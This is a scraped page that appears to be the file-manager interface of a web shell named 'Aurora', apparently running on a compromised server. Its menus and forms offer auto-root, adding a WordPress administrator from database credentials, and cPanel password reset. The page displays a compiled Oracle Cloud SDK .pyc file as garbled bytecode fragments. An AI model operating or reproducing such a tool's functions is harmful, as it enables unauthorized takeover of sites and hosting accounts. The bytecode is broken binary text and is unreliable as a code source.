Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
lib
python3.9
site-packages
oci
data_flow
models
__pycache__
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: sql_endpoint_secure_access_config.cpython-39.opt-1.pyc
a ���f$ � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�SqlEndpointNetworkConfiguration� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sd e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zd d� Z dd � Z dd� ZdS )�SqlEndpointSecureAccessConfigz; Access control rules for secure access selection. c K s8 dddd�| _ dddd�| _d| _d| _d| _d| _dS ) a Initializes a new SqlEndpointSecureAccessConfig object with values from keyword arguments. The default value of the :py:attr:`~oci.data_flow.models.SqlEndpointSecureAccessConfig.network_type` attribute of this class is ``SECURE_ACCESS`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param network_type: The value to assign to the network_type property of this SqlEndpointSecureAccessConfig. Allowed values for this property are: "VCN", "SECURE_ACCESS" :type network_type: str :param access_control_rules: The value to assign to the access_control_rules property of this SqlEndpointSecureAccessConfig. :type access_control_rules: list[oci.data_flow.models.SecureAccessControlRule] :param public_endpoint_ip: The value to assign to the public_endpoint_ip property of this SqlEndpointSecureAccessConfig. :type public_endpoint_ip: str �strzlist[SecureAccessControlRule])Znetwork_type�access_control_rules�public_endpoint_ipZnetworkTypeZaccessControlRulesZpublicEndpointIpNZ SECURE_ACCESS)Z swagger_typesZ attribute_mapZ _network_type�_access_control_rules�_public_endpoint_ip)�self�kwargs� r �Z/usr/lib/python3.9/site-packages/oci/data_flow/models/sql_endpoint_secure_access_config.py�__init__ s ��z&SqlEndpointSecureAccessConfig.__init__c C s | j S )a6 Gets the access_control_rules of this SqlEndpointSecureAccessConfig. A list of SecureAccessControlRule's to which access is limited to :return: The access_control_rules of this SqlEndpointSecureAccessConfig. :rtype: list[oci.data_flow.models.SecureAccessControlRule] �r �r r r r r 7 s z2SqlEndpointSecureAccessConfig.access_control_rulesc C s || _ dS )aI Sets the access_control_rules of this SqlEndpointSecureAccessConfig. A list of SecureAccessControlRule's to which access is limited to :param access_control_rules: The access_control_rules of this SqlEndpointSecureAccessConfig. :type: list[oci.data_flow.models.SecureAccessControlRule] Nr )r r r r r r C s c C s | j S )z� Gets the public_endpoint_ip of this SqlEndpointSecureAccessConfig. Ip Address of public endpoint :return: The public_endpoint_ip of this SqlEndpointSecureAccessConfig. :rtype: str �r r r r r r O s z0SqlEndpointSecureAccessConfig.public_endpoint_ipc C s || _ dS )z� Sets the public_endpoint_ip of this SqlEndpointSecureAccessConfig. Ip Address of public endpoint :param public_endpoint_ip: The public_endpoint_ip of this SqlEndpointSecureAccessConfig. :type: str Nr )r r r r r r [ s c C s t | �S �N)r r r r r �__repr__g s z&SqlEndpointSecureAccessConfig.__repr__c C s |d u rdS | j |j kS )NF)�__dict__�r �otherr r r �__eq__j s z$SqlEndpointSecureAccessConfig.__eq__c C s | |k S r r r r r r �__ne__p s z$SqlEndpointSecureAccessConfig.__ne__N)�__name__� __module__�__qualname__�__doc__r �propertyr �setterr r r r r r r r r s % r N) Z"sql_endpoint_network_configurationr Zoci.utilr r r Zoci.decoratorsr r r r r r �<module> s